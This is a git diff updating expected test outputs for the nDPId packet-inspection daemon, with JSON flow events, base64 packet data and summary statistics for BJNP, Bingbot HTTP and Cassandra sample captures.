+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1467725385329} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 10/0 +~~ packets captured/processed: 10/10 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 0 -~~ total active/idle flows...: 0/0 +~~ total layer4 data length..: 160 bytes +~~ total detected protocols..: 10 +~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5099937 bytes -~~ total memory freed........: 5099937 bytes -~~ total allocations/frees...: 113310/113310 +~~ total memory allocated....: 5108947 bytes +~~ total memory freed........: 5108947 bytes +~~ total allocations/frees...: 113350/113350 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 175 chars -~~ json string max len.......: 551 chars -~~ json string avg len.......: 361 chars +~~ json string min len.......: 440 chars +~~ json string max len.......: 682 chars +~~ json string avg len.......: 560 chars diff --git a/test/results/bot.pcap.out b/test/results/bot.pcap.out index e73ae6042..27b0d5e06 100644 --- a/test/results/bot.pcap.out +++ b/test/results/bot.pcap.out 
@@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645108240233} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645108240233,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1645108240233,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645108240233,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1645108240233,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"thread_ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","packets-captured":402,"packets-processed":402,"total-skipped-flows":0,"total-l4-data-len":407096,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1645108245896} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 402/402 diff --git a/test/results/cassandra.pcap.out b/test/results/cassandra.pcap.out index 5ca43793e..c5fe1531d 100644 --- a/test/results/cassandra.pcap.out +++ b/test/results/cassandra.pcap.out 
@@ -1,17 +1,17 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"cassandra.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1450889498032} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} 
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="} 
